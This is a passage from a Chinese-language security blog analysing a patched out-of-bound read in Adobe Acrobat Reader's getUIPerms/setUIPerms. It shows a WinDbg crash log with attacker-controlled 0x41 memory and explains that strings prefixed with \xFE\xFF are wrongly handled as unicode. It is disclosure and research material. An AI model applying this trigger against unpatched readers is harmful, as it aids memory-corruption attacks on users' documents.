<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">0:000&gt; p</span><br><span class="line">Breakpoint 2 hit</span><br><span class="line">eax&#x3D;4b9cef98 ebx&#x3D;0098cec4 ecx&#x3D;00000000 edx&#x3D;7fffff99 esi&#x3D;4b9cef98 edi&#x3D;0098ce4c</span><br><span class="line">eip&#x3D;529145bf esp&#x3D;0098ce10 ebp&#x3D;0098ce28 iopl&#x3D;0         nv up ei pl nz na po nc</span><br><span class="line">cs&#x3D;0023  ss&#x3D;002b  ds&#x3D;002b  es&#x3D;002b  fs&#x3D;0053  gs&#x3D;002b             efl&#x3D;00000202</span><br><span class="line">EScript!PlugInMain+0x2b42:</span><br><span class="line">529145bf e8b1e5ffff      call    EScript!PlugInMain+0x10f8 (52912b75)</span><br><span class="line">0:000&gt; dd esi</span><br><span class="line">4b9cef98  4141fffe 41414141 41414141 41414141</span><br><span class="line">4b9cefa8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefb8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefc8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefd8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9cefe8  41414141 41414141 41414141 41414141</span><br><span class="line">4b9ceff8  41414141 d0004141 ???????? ????????</span><br><span class="line">4b9cf008  ???????? ???????? ???????? ????????</span><br></pre></td></tr></table></figure>

<p>处理函数判断是不是<code>unicode</code>，只是判断前两个字符是不是<code>\xFE\xFF</code>，就走了<code>unicode</code>逻辑，所以导致越界读。</p>
<h2 id="0x03-what-is-root-cause"><a href="#0x03-what-is-root-cause" class="headerlink" title="0x03 : what is root cause"></a>0x03 : what is root cause</h2><p>其实就是上层一点的逻辑对输入的参数没做转换(to unicode)，导致后面获取长度的函数处理字符串的时候，误认为<code>\xFE\xFF</code>开头的就是unicode字符串，然后就越界读取了。</p>
<h2 id="0x04-🤔"><a href="#0x04-🤔" class="headerlink" title="0x04 : 🤔"></a>0x04 : 🤔</h2><p>几个月前写的分析了，可能会有错误，有问题欢迎和我沟通  : -)</p>
<p>这个攻击面可能就这么一点一点的消失了吧 :-)</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search">Search</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Unicode-String-Out-of-bound-Read"><span class="toc-number">1.</span> <span class="toc-text">Unicode String Out-of-bound Read</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-PoC"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 : PoC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Crash-log"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 : Crash log</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-Analysis"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 : Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-what-is-root-cause"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 : what is root cause</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%F0%9F%A4%94"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 : 🤔</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&text=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&is_video=false&description=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read&body=Check out this article: https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&title=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&name=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read&description=&lt;h1 id=&#34;Unicode-String-Out-of-bound-Read&#34;&gt;&lt;a href=&#34;#Unicode-String-Out-of-bound-Read&#34; class=&#34;headerlink&#34; title=&#34;Unicode String Out-of-bound Read&#34;&gt;&lt;/a&gt;Unicode String Out-of-bound Read&lt;/h1&gt;&lt;p&gt;8月补丁被xlab撞了，索性就放出来了。&lt;/p&gt;
&lt;p&gt;[TOC]&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://o0xmuhe.github.io/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/&t=Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2015-2022
    muhe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a href="/search">Search</a></li><!--
     --><!--
       --><li><a href="/atom.xml">RSS</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-170118462-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-170118462-1');
    </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'o0xmuhe';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
